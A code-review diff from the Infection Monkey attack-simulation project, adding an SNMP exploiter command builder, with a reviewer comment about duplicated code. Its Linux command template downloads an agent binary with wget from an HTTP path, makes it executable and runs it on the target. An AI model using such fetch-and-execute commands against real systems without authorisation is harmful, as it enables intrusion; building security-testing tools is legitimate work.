monkey/agent_plugins/exploiters/snmp/src/snmp_command_builder.py

```diff
@@ -0,0 +1,39 @@
+from typing import Sequence
+
+from common import OperatingSystem
+from common.common_consts import AGENT_OTP_ENVIRONMENT_VARIABLE
+from common.types import AgentID
+from infection_monkey.exploit.tools.helpers import get_agent_dst_path
+from infection_monkey.i_puppet import TargetHost
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.utils.commands import build_monkey_commandline
+
+SNMP_LINUX_COMMAND_TEMPLATE = (
+    "wget -O %(monkey_path)s %(http_path)s "
+    "; chmod +x %(monkey_path)s "
+    "; %(agent_otp_environment_variable)s=%(agent_otp)s "
+    "%(monkey_path)s %(monkey_type)s %(parameters)s"
+)
```

Comment:
These are starting to get repetitive. I've created an issue to look for common patterns across exploiters and reduce code duplication. https://github.com/guardicore/monkey/issues/3314